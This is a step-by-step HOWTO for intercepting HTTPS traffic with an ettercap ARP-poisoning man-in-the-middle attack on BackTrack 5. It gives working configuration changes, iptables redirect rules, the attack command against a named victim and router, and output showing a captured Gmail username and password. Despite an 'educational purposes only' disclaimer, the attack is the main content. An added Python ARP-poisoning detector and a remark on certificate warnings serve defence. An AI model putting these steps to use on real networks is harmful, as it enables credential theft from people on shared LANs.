HOWTO : Sniffing SSL with ettercap on Back|Track 5

*** WARNING : This HOWTO is for educational purposes only. Do NOT carry out the following steps on a LAN without permission. Otherwise, you may end up in jail. ***



Sniffing SSL (https) traffic on a LAN with ettercap by means of a Man In The Middle (MITM) attack.



Step 1 :



nano /etc/etter.conf



Make the following changes :



[privs]

ec_uid = 0    # nobody is the default

ec_gid = 0    # nobody is the default




Uncomment the following :



# if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"




Step 2 :



The victim's machine is at 192.168.1.100 while the router is at 192.168.1.1. The attacker is at 192.168.1.115.



ettercap -TqM arp:remote /192.168.1.100/ /192.168.1.1/



The output displayed will be similar to the following :



ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA



Dissector "dns" not supported (etter.conf line 72)

Listening on eth0... (Ethernet)



eth0 ->    08:00:27:FF:95:DB    192.168.1.115 255.255.255.0



Privileges dropped to UID 0 GID 0...



  28 plugins

  39 protocol dissectors

  53 ports monitored

7587 mac vendor fingerprint

1698 tcp OS fingerprint

2183 known services



Scanning for merged targets (2 hosts)...



* |=================================================>| 100.00 %



2 hosts added to the hosts list...



ARP poisoning victims:



GROUP 1 : 192.168.1.100 70:1A:04:FF:0A:9A



GROUP 2 : 192.168.1.1 00:1E:10:FF:A7:E2

Starting Unified sniffing...





Text only Interface activated...

Hit 'h' for inline help




Step 3 :



At the victim's machine, open a browser such as Firefox and go to GMail. You will be asked to accept an untrusted certificate. Just accept the certificate and you will be directed to the GMail login screen.



When the victim logs in to GMail, his/her username and password will be logged on the attacker's machine. The display will be similar to the following :



HTTP : 74.125.71.106:443 -> USER: samiux PASS: password INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/?ui=html&zy=l&bsv=llya694le36z&s



In that line you will find USER: samiux and PASS: password.
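From the defender's side, the ARP poisoning in Step 2 leaves a clear trace : the router's IP suddenly answers from a different MAC, and one MAC (the attacker's) starts answering for several IPs. The following detector is an added example, not part of the original HOWTO and not ettercap code; it replays a constructed sequence of ARP replies using the MAC addresses shown in the ettercap output above and reports both signs.

```python
"""Flag ARP cache poisoning from a stream of (timestamp, sender IP, sender MAC).

Two signatures are checked, both visible in Step 2 of the HOWTO above:
  * an IP that was already bound to one MAC suddenly claims another MAC
    (the gateway 192.168.1.1 "moving" to the attacker's NIC);
  * a single MAC answering for more than one IP (the attacker's
    08:00:27:FF:95:DB claiming both the router and the victim).
"""
from collections import defaultdict

# Constructed sample of ARP replies; the MACs are those from the ettercap output.
ARP_REPLIES = [
    (0.0, "192.168.1.1",   "00:1E:10:FF:A7:E2"),  # genuine router
    (0.5, "192.168.1.100", "70:1A:04:FF:0A:9A"),  # genuine victim
    (1.0, "192.168.1.115", "08:00:27:FF:95:DB"),  # attacker's own host
    (2.0, "192.168.1.1",   "08:00:27:FF:95:DB"),  # poison: router "at" attacker
    (2.0, "192.168.1.100", "08:00:27:FF:95:DB"),  # poison: victim "at" attacker
]


def detect_arp_poisoning(replies, watched_ips=("192.168.1.1",)):
    """Return a list of alert strings; an empty list means nothing suspicious."""
    ip_to_mac = {}                  # last MAC seen for each IP
    mac_to_ips = defaultdict(set)   # all IPs each MAC has claimed
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        old = ip_to_mac.get(ip)
        if old is not None and old != mac:
            # A gateway changing MAC is the classic MITM sign, so rank it higher.
            sev = "HIGH" if ip in watched_ips else "MEDIUM"
            alerts.append(f"[{sev}] t={ts}: {ip} changed {old} -> {mac}")
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append(f"[HIGH] t={ts}: {mac} claims {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_poisoning(ARP_REPLIES):
        print(line)
```

Feeding it the first three replies only yields no alerts; the two poisoning replies at t=2.0 produce four.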



Remarks :



To delete the untrusted certificate in Firefox on the victim's machine : "Edit" -- "Preferences" -- "View Certificate List" -- "Server". You will find entries like the following. Just delete them all.



Thawte Consulting (Pty) Ltd.

www.google.com www.google.com:443 forever 2011-09-21

www.google.com mail.google.com:443 forever 2011-09-21




In normal use, GMail will never ask you to accept a certificate, least of all an untrusted one; such a prompt is itself the sign that something is wrong with the connection.



That's all! See you.